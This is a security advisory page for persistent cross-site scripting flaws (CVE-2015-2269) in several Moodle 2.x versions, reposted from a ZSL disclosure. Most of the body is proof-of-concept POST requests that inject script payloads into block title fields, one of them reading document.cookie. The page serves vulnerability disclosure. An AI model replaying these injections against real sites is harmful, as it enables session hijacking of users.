Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Moodle 2.5.9 / 2.6.8 / 2.7.5 / 2.8.3 Cross Site Scripting
2015.03.18
Credit:
Gjoko 'LiquidWorm' Krstic
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2015-2269
CWE:
CWE-79
CVSS Base Score:
3.5/10
Impact Subscore:
2.9/10
Exploitability Subscore:
6.8/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
Single time
Confidentiality impact:
None
Integrity impact:
Partial
Availability impact:
None
? Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting Vendor: Moodle Pty Ltd Product web page: https://www.moodle.org Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9 Summary: Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Desc: Moodle suffers from persistent XSS vulnerabilities. Input passed to the POST parameters 'config_title' and 'title' thru index.php, are not properly sanitized allowing the attacker to execute HTML or JS code into user's browser session on the affected site. Affected components: Blocks, Glossary, RSS and Tags. Tested on: nginx PHP/5.4.22 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5236 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php Vendor Advisory ID: MSA-15-0013 Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383 CVE ID: CVE-2015-2269 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269 09.02.2015 -- Random Glossary Entry --------------------- POST http://WEB/my/index.php HTTP/1.1 _qf__block_glossary_random_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=304 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_addentry=test config_invisible=test2 config_refresh=0 config_showconcept=1 config_title=" onmouseover=prompt("XSS1") > config_type=0 config_viewglossary=test3 mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Remote RSS Feeds ---------------- POST http://WEB/my/index.php HTTP/1.1 _qf__block_rss_client_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=312 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_block_rss_client_show_channel_image=0 config_block_rss_client_show_channel_link=0 config_display_description=0 config_rssid=_qf__force_multiselect_submission config_rssid[]=3 config_shownumentries=11 config_title=" onmouseover=prompt("XSS2") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Tags ---- POST http://WEB/my/index.php HTTP/1.1 _qf__block_tags_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=313 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_numberoftags=80 config_tagtype= config_title=Tags" onmouseover=prompt("XSS3") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Older not supported versions ---------------------------- POST http://WEB/blog/index.php HTTP/1.1 blockaction=config filterselect=1343 filtertype=user instanceid=4992 numberoftags=20 sesskey=0QCG5LQz0Q sort=name timewithin=90 title=ZSL"><script>alert(document.cookie);</script>
References:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top